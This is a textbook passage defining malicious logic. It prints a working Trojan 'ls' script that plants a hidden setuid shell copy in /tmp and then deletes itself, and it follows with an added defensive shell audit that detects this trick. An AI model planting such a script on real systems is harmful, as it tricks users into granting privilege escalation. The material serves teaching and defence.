
22.1 Introduction

Odysseus, of Trojan War fame, found the most effective way to breach a hitherto-impregnable fortress was to have people inside bring him in without knowing they were doing so [482, 1016]. The same approach works for computer systems.

Definition 22–1. Malicious logic is a set of instructions that cause a site's security policy to be violated.

EXAMPLE: The following UNIX script is named ls and is placed in a directory.

cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*

It creates a copy of the UNIX shell that is setuid to the user executing this program (see Section 14.3). This program is deleted, and then the correct ls command is executed. On most systems, it is against policy to trick someone into creating a shell that is setuid to themselves. If someone is tricked into executing this script, a violation of the (implicit) security policy occurs. This script is an example of malicious logic.
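The checks a defender would run against this scenario, as an added example that is not part of the original text: it flags search-path entries that consult the current directory, setuid or setgid files under a directory such as /tmp, and executables that shadow a system command. The function names are hypothetical, and the example assumes the victim runs the planted ls through a search path that includes the current directory.

```shell
#!/bin/sh
# Added defensive example; all function names here are hypothetical.

# Print each search-path entry that resolves relative to the current directory:
# ".", an empty entry (leading, trailing or doubled ":"), or any non-absolute path.
risky_path_entries() {
    rest="$1:"                        # trailing ":" exposes a final empty entry
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            /*) ;;                    # absolute: unaffected by the working directory
            '') echo "(empty)" ;;     # an empty entry means the current directory
            *)  echo "$entry" ;;      # "." or another relative path
        esac
    done
}

# List regular files under a directory that carry the setuid or setgid bit,
# such as the hidden shell copy the script above leaves in /tmp.
setid_files_in() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null || true
}

# List executables in a directory whose names shadow a command in /bin or /usr/bin.
shadowing_commands_in() {
    for f in "$1"/* "$1"/.[!.]*; do
        [ -f "$f" ] && [ -x "$f" ] || continue
        name=${f##*/}
        for sys in /bin /usr/bin; do
            if [ -x "$sys/$name" ]; then echo "$f"; break; fi
        done
    done
}

audit() {
    echo "Search-path entries that consult the current directory:"; risky_path_entries "$PATH"
    echo "setuid/setgid files under $1:"; setid_files_in "$1"
    echo "Executables in $PWD that shadow system commands:"; shadowing_commands_in "$PWD"
}
if [ "$#" -gt 0 ]; then audit "$1"; fi
```

Run it with the directory to scan as its argument, for example /tmp.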

